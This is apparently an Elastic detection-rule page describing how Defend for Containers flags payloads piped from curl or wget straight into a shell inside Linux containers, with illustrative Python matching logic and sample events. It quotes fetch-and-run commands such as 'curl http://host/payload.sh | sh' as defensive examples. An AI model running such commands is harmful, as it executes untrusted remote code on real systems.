
Payload Execution via Shell Pipe Detected by Defend for Containers
Elastic Detection Rules
Summary
This detection rule identifies potential security incidents in which a payload is downloaded and piped directly to a shell inside a running Linux container. The behavior is often associated with threat actors executing malicious payloads without leaving a trace on the filesystem, because the payload runs immediately after download. Common patterns include commands such as `curl http://host/payload.sh | sh` or `wget -qO- http://host/bootstrap | bash`. The rule uses EQL (Event Query Language) to monitor interactive sessions in which a downloader process is immediately followed by shell execution. Investigative steps emphasize capturing the context of the command-line execution, identifying any network interactions, and monitoring for other processes started by the shell that may indicate further malicious activity. False positives may occur when legitimate administrators use similar command patterns for troubleshooting. The rule is part of Elastic Defend for Containers, operational as of version 9.3.0, and is classified as medium risk due to its potential implications.
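As an added illustration, not the rule's own EQL (which this page does not reproduce), the Python below applies the same sequence logic to constructed process events: a downloader followed by a shell in the same interactive container session within a short window. The ECS-style field names, the five-second window and the sample events are assumptions made for the example.

```python
from datetime import datetime, timedelta

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
MAXSPAN = timedelta(seconds=5)  # assumed window between downloader and shell


def _ts(ev):
    return datetime.fromisoformat(ev["@timestamp"])


def find_payload_pipes(events, maxspan=MAXSPAN):
    """Return (downloader_event, shell_event) pairs: a shell that started
    within `maxspan` after a downloader in the same interactive session
    of the same container, i.e. the `curl ... | sh` pattern."""
    events = sorted(events, key=_ts)  # stable sort keeps same-second order
    hits = []
    for i, dl in enumerate(events):
        if dl["process.name"] not in DOWNLOADERS or not dl["process.interactive"]:
            continue
        for sh in events[i + 1:]:
            if _ts(sh) - _ts(dl) > maxspan:
                break  # events are time-ordered; nothing later can match
            same_session = (sh["container.id"] == dl["container.id"]
                            and sh["session.id"] == dl["session.id"])
            if same_session and sh["process.name"] in SHELLS and sh["process.interactive"]:
                hits.append((dl, sh))
                break  # one shell per downloader is enough to alert on
    return hits


def _ev(ts, cid, sid, name, cmd, interactive=True):
    return {"@timestamp": ts, "container.id": cid, "session.id": sid,
            "process.name": name, "process.command_line": cmd,
            "process.interactive": interactive}


# Constructed sample: one pipe-to-shell, one benign download, one batch job.
SAMPLE_EVENTS = [
    _ev("2026-02-10T10:00:00", "c1", "s1", "curl", "curl -fsSL http://host/payload.sh"),
    _ev("2026-02-10T10:00:00", "c1", "s1", "sh", "sh"),
    _ev("2026-02-10T10:05:00", "c1", "s1", "curl", "curl -O http://host/release.tgz"),
    _ev("2026-02-10T10:05:30", "c1", "s1", "tar", "tar xzf release.tgz"),
    _ev("2026-02-10T11:00:00", "c2", "s9", "wget", "wget -qO- http://host/bootstrap", False),
    _ev("2026-02-10T11:00:01", "c2", "s9", "bash", "bash", False),
]

if __name__ == "__main__":
    for dl, sh in find_payload_pipes(SAMPLE_EVENTS):
        print(f"[{dl['container.id']}] {dl['process.command_line']} -> {sh['process.command_line']}")
```

The non-interactive wget/bash pair in the sample is deliberately not flagged, mirroring the rule's focus on interactive sessions; the benign download followed by `tar` is excluded because `tar` is not a shell.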
Categories
- Containers
- Linux
Data Sources
- Container
- Process
ATT&CK Techniques
- T1059
- T1059.004
- T1071
Created: 2026-02-10